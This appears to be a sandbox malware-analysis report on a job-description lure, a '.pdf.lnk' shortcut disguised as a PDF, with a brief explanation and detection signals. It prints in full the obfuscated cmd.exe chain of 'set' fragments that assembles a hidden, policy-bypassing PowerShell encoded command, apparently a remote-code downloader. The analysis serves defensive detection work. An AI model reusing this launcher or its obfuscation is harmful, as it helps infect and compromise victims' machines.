ZeroBOX

Behavioral Analysis

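Process tree

The tree below shows the shortcut `MLB_KOREAN_JOB_DESCRIPTION.pdf.lnk` (a double extension, so it appears to be a PDF when the `.lnk` suffix is hidden) being opened through cmd.exe. A child cmd.exe then stores short string fragments in randomly named variables with `set` and joins them with `call %...%`. The joined text is a minimized `start` of powershell.exe with `-NoLogo -NoProfile -WindowStyle hidden -ExecutionPolicy bypass -EncodedCommand`, which matches the powershell.exe child process listed last. For detection, the useful signals on this page are the `.pdf.lnk` name, a cmd.exe command line made of a long chain of `set "<random>=<fragment>"` followed by `call`, and a hidden-window PowerShell launched with an encoded command and an execution-policy bypass.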

  • cmd.exe "C:\Windows\System32\cmd.exe" /c start /wait "djoMrZ" C:\Users\test22\AppData\Local\Temp\MLB_KOREAN_JOB_DESCRIPTION.pdf.lnk

    2552
    • cmd.exe "C:\WINDOWS\system32\cmd.exe" /c set "TjnHYfRxWa=YQBzAGUANg" && set "XxwtDJaPct=sAIAAkAHkA" && set "bDwtozZyqE=0APQAiACkA" && set "BIVGlNsNoU=dAByAHkAew" && set "TcluocXKfb=AgAC0AZwB0" && set "zMIBZriQBh=QAdQByAGkA" && set "ZZusqJZmtQ=xecutionPo" && set "yFXoGrtJrL=4AYwBvAGQA" && set "MmMqeWIOFi=ACAAMAApAA" && set "EqIdOrRmjn=BTAGwAZQBl" && set "qtKFTTYurE=AGkAbgBnAC" && set "snEVWQpOuP=AEcAVgBpAE" && set "TMaEbbgsQT=bgB0ADsACg" && set "RmAFlbgkZU=MAIAAxADUA" && set "mEveuglXTa=AAoAJABjAG" && set "RiGCrpUpab=AHcAWgB3AD" && set "NWLWNbWdCY=QwBvAG4Adg" && set "uKwwRshDBH=cQB1AGUAcw" && set "TyzfJstCFR=BNAG0AVQAy" && set "NfTMXIilyz=B5AGUAKQA7" && set "fFsezeqgeq=QAZQBuAHQA" && set "KgWpffnYAW=A9AD0AIgAp" && set "zhraxSSzuI= "" powers" && set "SdmiBxLDtW=ADoAOgBGAH" && set "zwZZhreAAq=AHQALgBFAG" && set "roifXiuEUg=EASABSADAA" && set "rOmxHGNTgd=AEMASQBJAC" && set "qZLdtCgkin=BuAGcAKABb" && set "fynWIDORfN=AoAFsAUwB5" && set "ihwOxETVfk=Command JA" && set "dchNDOhYMZ=AEkALgBHAG" && set "QJhOrKXjCB=AAkAewAKAA" && set "MhrUTNGYFx=B0AHIAaQBu" && set "lfZAeaeKgt=ACkAOwAKAC" && set "kKsTLYyupN=AHcAcAAgAC" && set "sNPYhFfxWg=AGIAeQBlAD" && set "TpSIyPtwZv=UAdABTAHQA" && set "KkkXMtHfZU=ZQBtAC4AVA" && set "WHNdSAzHNf=BCAHoATAAy" && set "rNyOCSQIKg=BuAHYAbwBr" && set "dWYFHRStXF=0AWwBTAHkA" && set "bkVkhPTSec=NoLogo -No" && set "QeVrJoypwB=ADEAOwAKAA" && set "RUaWyRHQuU=IAbABZADIA" && set "FpUOTNStKA=AGcAKAAiAG" && set "VYNegyYlXL=AGUAVwBSAG" && set "qIKCUwBAij=0ALgBDAG8A" && set "EoowUnpyYh=indowStyle" && set "DfsnUcTgFg=AFkAagBnAH" && set "BnCmaRDKwV=IAA9ACAAMQ" && set "LZfAavpFYm=AEUAbgBjAG" && set "QEhDXYbieC=UAKAAkAGMA" && set "VLQrvNbsvi=AHoATABuAF" && set "uJfzqLEKfc=KQA7AAoAJA" && set "sBejxLYLRs=IAA9ACAAKA" && set "CABYzgxxvr=bwB1AG4AdA" && set "ucVjukLiUo=start /min" && set "briQMnmKwu=8AbgB0AGUA" && set "cUspthchmF=MAeQBzAHQA" && set "bDCaPovznl=ZwB2AFoAZw" && set "lLiNvvsyHR=AuAFQAZQB4" && set "lvMKFTtJON=AHAAIAAtAH" && set "yJRnVfsvnj=AGMAbwBuAH" && 
set "usjZfmaFEE=AHAAPQBbAF" && set "dxVJkbAfud=BlAHgAdAAu" && set "fXwjcPVYLt=cAByAGUAcw" && set "GoGsnQnaWQ=eABsAEwAMw" && set "EUegkQmPFZ=AFMAeQBzAH" && set "AHQVhJQFkw=gAIgBhAFcA" && set "lbWAUubWaU=bgB2AGUAcg" && set "jUrJQWBMnl=AgAC0APQAg" && set "FncKXuOuBq=AJAAkAYgBy" && set "ovxVxqlhIr=IAAtAFUAcw" && set "aDaRlJPjdb=BlAHIAdABd" && set "bnJWBwevld=0AQgBhAHMA" && set "qheQdOsxFy=ZQA2ADQAUw" && set "eqgCyTWOdO=YwBIAE0ANg" && set "brdcQqNkUD=AKAAkACQAk" && set "kiRfpiioRm=B6AGQAbABN" && set "mSfXwDbnfy=AKAH0ACgA=" && set "hKWOQKomJA=WgBqAGcAeg" && set "CdfUWpIjbg=NABaAEQAYw" && set "QfQNxampWp=BMAHkAOQB0" && set "NhpKzjZEKH=0AVwBWAGgA" && set "jEDkeIrPfl=cATQBXAEUA" && set "EUzKheKIZQ=IAA9ACAASQ" && set "odfhiqYUUz=B5AGQAdQB2" && set "sceysoispa=gAZABHAEYA" && set "ehEGAHjiti=IAbwBtAEIA" && set "iLjcIMbryB=ACAAJABjAG" && set "ZHfDZDjgfR=UAYgBSAGUA" && set "ytLfgwbtYo=A6ADoAQQBT" && set "DIqxJWEcWP=AkAGkAcwB1" && set "gsxhMcHUWS=AJAAkASQBu" && set "CUqShwKEaH=sACgAJAH0A" && set "rppWWkilnL=8AZABpAG4A" && set "GyqShYfrXf=AGgAaQBsAG" && set "ZOXKrOSKdN=YQByAHQALQ" && set "hsfywJokQA=EAcgBzAGkA" && set "bCqmXvKujn=B0AF0AOgA6" && set "oIvYUHvtVL=B0ACAALQBV" && set "xaWfxreeLe=AHMAdABlAG" && set "zuUXwkFdnO=s -Encoded" && set "GXxBHSTMdH=MgBRADAAWQ" && set "rsIQUsNlkm=aQBuAGcAXQ" && set "ETqoSfTRik=UwB0AHIAaQ" && set "FVFJBFYJfr=ZwBdADoAOg" && set "btnYpOFMnb=BzAGkAbwBu" && set "VOaCORREdU=8AdQBuAHQA" && set "qyuXVxOLbl=AEYAcgBvAG" && set "FhqfnpmgSH= hidden -E" && set "wMESCJLjmS=bwB1AG4AdA" && set "QxZTecsJUN=A1AEwAbQBw" && set "OEzksKkxlb=AGUAYQBrAD" && set "TatfGwoMOf=cwB0AGUAbQ" && set "LmOCYEfCmj=AGkAYwBQAG" && set "uuqfIlaqLf=UALQBFAHgA" && set "JjtTKfdVpE=kACQAkAGMA" && set "wOmIWVIxUD=OwAKAAkAfQ" && set "vWzfPwZZCL=AGUALQBXAG" && set "mqBIVdfolH=kACQBTAHQA" && set "ReqWKmxvIW=NQBlAEcANQ" && set "ZpivkNWzqU=licy bypas" && set "APrDhxXOtJ=AwADsACgB3" && set "vOKQgfXssa=oAewAKAAkA" && set "fLfoRKHUPY=AHIAaQAgAC" && set "gxfsAbxZwa=AFYAbQBPAF" && set 
"IoUEJKKCup=A0AFMAdABy" && set "FIBEVNoySs=CgAJAGMAYQ" && set "wGAGFuCgcm=cgBpAG4AZw" && set "iPluMIEhFh=BlAEIAYQBz" && set "bsSNPRwkSd=ZAB1AHYAYg" && set "VeHElgDcva=BvAGUAbQBO" && set "IJCSLLAcox=QAdQByAGkA" && set "FhMwlnEESP=hell.exe -" && set "rWiAduopww=Profile -W" && set "bIgWAgOjfP=4ARwBlAHQA" && set "TfrYJcMrsc=cASQAzAE0A" && set "lJUzkPKMYd=AHYAbwBrAG" && set "GWMjUKeJXq=BBAFMAQwBJ" && set "ySjgGpmQmr=B0AGMAaAAK" && set "pIVrtuwCCH=BpAHMAdQB3" && set "yzlxQSyhfd=bgBnADsACg" && set "ISoiKxxYFC=QAZQBtAC4A" && call %ucVjukLiUo%%zhraxSSzuI%%FhMwlnEESP%%bkVkhPTSec%%rWiAduopww%%EoowUnpyYh%%FhqfnpmgSH%%ZZusqJZmtQ%%ZpivkNWzqU%%zuUXwkFdnO%%ihwOxETVfk%%odfhiqYUUz%%sNPYhFfxWg%%dWYFHRStXF%%TatfGwoMOf%%lLiNvvsyHR%%zwZZhreAAq%%yFXoGrtJrL%%rsIQUsNlkm%%ytLfgwbtYo%%rOmxHGNTgd%%bIgWAgOjfP%%ETqoSfTRik%%qZLdtCgkin%%EUegkQmPFZ%%ISoiKxxYFC%%NWLWNbWdCY%%aDaRlJPjdb%%SdmiBxLDtW%%ehEGAHjiti%%TjnHYfRxWa%%IoUEJKKCup%%qtKFTTYurE%%AHQVhJQFkw%%GoGsnQnaWQ%%WHNdSAzHNf%%gxfsAbxZwa%%TfrYJcMrsc%%GXxBHSTMdH%%kiRfpiioRm%%snEVWQpOuP%%NhpKzjZEKH%%hKWOQKomJA%%TyzfJstCFR%%DfsnUcTgFg%%jEDkeIrPfl%%CdfUWpIjbg%%QxZTecsJUN%%RiGCrpUpab%%bDwtozZyqE%%uJfzqLEKfc%%pIVrtuwCCH%%usjZfmaFEE%%cUspthchmF%%KkkXMtHfZU%%dxVJkbAfud%%LZfAavpFYm%%rppWWkilnL%%FVFJBFYJfr%%GWMjUKeJXq%%dchNDOhYMZ%%TpSIyPtwZv%%wGAGFuCgcm%%fynWIDORfN%%xaWfxreeLe%%qIKCUwBAij%%lbWAUubWaU%%bCqmXvKujn%%qyuXVxOLbl%%bnJWBwevld%%qheQdOsxFy%%MhrUTNGYFx%%FpUOTNStKA%%roifXiuEUg%%eqgCyTWOdO%%QfQNxampWp%%VYNegyYlXL%%sceysoispa%%ReqWKmxvIW%%VeHElgDcva%%VLQrvNbsvi%%RUaWyRHQuU%%bDCaPovznl%%KgWpffnYAW%%lfZAeaeKgt%%zMIBZriQBh%%sBejxLYLRs%%DIqxJWEcWP%%kKsTLYyupN%%XxwtDJaPct%%bsSNPRwkSd%%NfTMXIilyz%%mEveuglXTa%%VOaCORREdU%%BnCmaRDKwV%%APrDhxXOtJ%%GyqShYfrXf%%QEhDXYbieC%%CABYzgxxvr%%TcluocXKfb%%MmMqeWIOFi%%vOKQgfXssa%%BIVGlNsNoU%%brdcQqNkUD%%yJRnVfsvnj%%fFsezeqgeq%%EUzKheKIZQ%%rNyOCSQIKg%%vWzfPwZZCL%%ZHfDZDjgfR%%uKwwRshDBH%%oIvYUHvtVL%%fLfoRKHUPY%%IJCSLLAcox%%ovxVxqlhIr%%iPluMIEhFh%%LmOCYEfCmj%%hsfywJokQA%%yzlxQSyhfd%%gsxhMcHUWS%%lJUzkPKMYd%%uuqfIlaqLf%%fXwjcPV
YLt%%btnYpOFMnb%%iLjcIMbryB%%briQMnmKwu%%TMaEbbgsQT%%FncKXuOuBq%%OEzksKkxlb%%CUqShwKEaH%%FIBEVNoySs%%ySjgGpmQmr%%QJhOrKXjCB%%JjtTKfdVpE%%wMESCJLjmS%%jUrJQWBMnl%%QeVrJoypwB%%mqBIVdfolH%%ZOXKrOSKdN%%EqIdOrRmjn%%lvMKFTtJON%%RmAFlbgkZU%%wOmIWVIxUD%%mSfXwDbnfy%

      2704
      • powershell.exe powershell.exe -NoLogo -NoProfile -WindowStyle hidden -ExecutionPolicy bypass -EncodedCommand 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

        2808
